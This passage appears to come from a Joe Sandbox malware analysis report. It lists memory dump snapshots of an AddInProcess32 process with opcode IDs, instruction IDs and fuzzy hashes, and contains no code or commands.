                    • Instruction Fuzzy Hash: 7681B5317002248FDF14AB74E9947AEBBA2FFC9310F144569D406DB395DB35DC468B91
                    Memory Dump Source
                    • Source File: 00000009.00000002.618462989.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_520000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3b888ce0028487069ade6af91857923866c6d5e3e4c4f5bcfd1ced73942adede
                    • Instruction ID: 64dd95e7aee05c346bce79939f3071a1e0e00c1f288c2ec36f230fe4c89b0870
                    • Opcode Fuzzy Hash: 3b888ce0028487069ade6af91857923866c6d5e3e4c4f5bcfd1ced73942adede
                    • Instruction Fuzzy Hash: 01512D70B002148FDB54EF75D895B6E7BE2AFC5310F10846AD80AAB3D4EB74AD46CB91
                    Memory Dump Source
                    • Source File: 00000009.00000002.618462989.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_520000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bb0ac097c559ede0e748f42ead5917b6cda5954654ce3616418ce51420e4b3a4
                    • Instruction ID: 475cd43f1f9b1cff8dd1e583da32c492aea1a16c681262cbec4a8237eaa535cd
                    • Opcode Fuzzy Hash: bb0ac097c559ede0e748f42ead5917b6cda5954654ce3616418ce51420e4b3a4
                    • Instruction Fuzzy Hash: FB31D274A4A3908FDB02CF74DC95A9DBFB0AF4A300F14819AE445EB2D2D725D806CB91
                    Memory Dump Source
                    • Source File: 00000009.00000002.618462989.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_520000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2710ffb27e1944e47d02a801871ef373c4d06e79a2fa5636f814d87d62aaa0f4
                    • Instruction ID: bad2b9f4f983a60a937b7ade19e1a05a20dfb5df7a6e6c9d6128529af8d3282f
                    • Opcode Fuzzy Hash: 2710ffb27e1944e47d02a801871ef373c4d06e79a2fa5636f814d87d62aaa0f4
                    • Instruction Fuzzy Hash: 67217F75E022159FDB10DF69D885BAEBBF1FB88310F104026E905E7391E775ED419B90
                    Memory Dump Source
                    • Source File: 00000009.00000002.618326913.000000000027D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0027D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_27d000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1c1900a2430152aa63bea3d93224dbcdcc34c55a55d8a79f06f80e532b68c0f1
                    • Instruction ID: 0b01298ca9e04dbaa1eefa095a2b34fc52d65130c6cd89b0a6b06482c8a6cdb3
                    • Opcode Fuzzy Hash: 1c1900a2430152aa63bea3d93224dbcdcc34c55a55d8a79f06f80e532b68c0f1
                    • Instruction Fuzzy Hash: 2D21D075624340DFEB14DF24D884B16BB71EF84314F34C569D80D4B246C376D866CBA2
                    Memory Dump Source
                    • Source File: 00000009.00000002.618462989.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_520000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8ebd881c37825b2c64261d891c67760f48336dd60843bb96d595c6fae667225e
                    • Instruction ID: 966b3f3531f5486cd31170fedbf556fd4cf975152dc84bd5a90bd663404db37c
                    • Opcode Fuzzy Hash: 8ebd881c37825b2c64261d891c67760f48336dd60843bb96d595c6fae667225e
                    • Instruction Fuzzy Hash: A121CF30B012189FCF14EBA9E554B9EBBA6FF95310F148439E509DB382DB70EC428B84
                    Memory Dump Source
                    • Source File: 00000009.00000002.618462989.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_520000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 03bbb0520807f5dfcee50e4da847e8d88d4eac95c561840749bc39e67bcb074b
                    • Instruction ID: b4ecd4750061f578aeb16c847d89e39e1e287ee4558c9e5a360938e95f25bace
                    • Opcode Fuzzy Hash: 03bbb0520807f5dfcee50e4da847e8d88d4eac95c561840749bc39e67bcb074b
                    • Instruction Fuzzy Hash: B521E434A006198BCB10EFA4E5C4AAEBBB2FF99305F248555D802A7399C730EC86CF54
                    Memory Dump Source
                    • Source File: 00000009.00000002.618326913.000000000027D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0027D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_27d000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f2725d100ff9843043464e0f8a3b12d59a6e09497fd7c743d9bd57b8ed92dc9b
                    • Instruction ID: 10f543d8f2fc63cc59717e12d2a6c0ffdd7e26c8ab91246bdf39992daee7d4bc
                    • Opcode Fuzzy Hash: f2725d100ff9843043464e0f8a3b12d59a6e09497fd7c743d9bd57b8ed92dc9b
                    • Instruction Fuzzy Hash: 98218E755093808FDB02CF24D994715BF71EF46314F28C5EAD8498F6A7C33A981ACB62
                    Memory Dump Source
                    • Source File: 00000009.00000002.618462989.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_520000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 98e648c5945276087586132d5e6f15839a495d16bbc0f9b0cf4f7a120fe2b0e1
                    • Instruction ID: 8f120bd1d671ff065f6237bf735f1c2b88bd04adf6db3f0a0d9d96a0baa77555
                    • Opcode Fuzzy Hash: 98e648c5945276087586132d5e6f15839a495d16bbc0f9b0cf4f7a120fe2b0e1
                    • Instruction Fuzzy Hash: B41152357011284FCB149A79DC196AF7BA6FBC9311B11453AD406EB394DE65EC0187D1
                    Memory Dump Source
                    • Source File: 00000009.00000002.618462989.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_520000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b157c9e85690c6be27d19500e2304e68a01cccad0b2c063ab536282b7cc65c36
                    • Instruction ID: 8a6a7b16f2d4e7cbda9be8c13bd2174a8cf40c87045b6559ae2237e451a7e570
                    • Opcode Fuzzy Hash: b157c9e85690c6be27d19500e2304e68a01cccad0b2c063ab536282b7cc65c36
                    • Instruction Fuzzy Hash: 5201B136B020244FCB549A78EC296EF7BA6AFD9310F11453AE406D73D0EE609C0687D2
                    Memory Dump Source
                    • Source File: 00000009.00000002.618462989.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_520000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 75279fd4390c4b5bb68c324ed9650ef35de0ce48af302a972bdc5e8b77df11bf
                    • Instruction ID: e4f865457b8669bf7f40761799d6fc49988701afbc46bcd66e9768870c574567
                    • Opcode Fuzzy Hash: 75279fd4390c4b5bb68c324ed9650ef35de0ce48af302a972bdc5e8b77df11bf
                    • Instruction Fuzzy Hash: EA112539604324EBCB249AA1F8506A97BA1FF82310F10483AD904E72D5D762DD4A9791
                    Memory Dump Source
                    • Source File: 00000009.00000002.618462989.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_520000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f2bbb3627dc98da2c7de9233ea2c916d0fa3faf16391df966438b492b13d40f4
                    • Instruction ID: 4a81be2fad46eebedf66dcfbe8043c0c57c1d38c5278b6eee6bab6680dd1b100
                    • Opcode Fuzzy Hash: f2bbb3627dc98da2c7de9233ea2c916d0fa3faf16391df966438b492b13d40f4
                    • Instruction Fuzzy Hash: 150149317043600FDB215B79AC6579E2F92EFC3320B00097EE006CB281C961CC078781
                    Memory Dump Source
                    • Source File: 00000009.00000002.618462989.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_520000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 05f55ed0997d82ad1d68b3743d24adfaaf409604d2039db5670425b11a41e387
                    • Instruction ID: bce47785a653e26186dab48b417f20f76128324e3b30fabaf8fc04ab866b0e34
                    • Opcode Fuzzy Hash: 05f55ed0997d82ad1d68b3743d24adfaaf409604d2039db5670425b11a41e387
                    • Instruction Fuzzy Hash: 820144317001244BDB20EA79F855B2EB7E6EFCA710F108839F14ECB394EA21ED464B81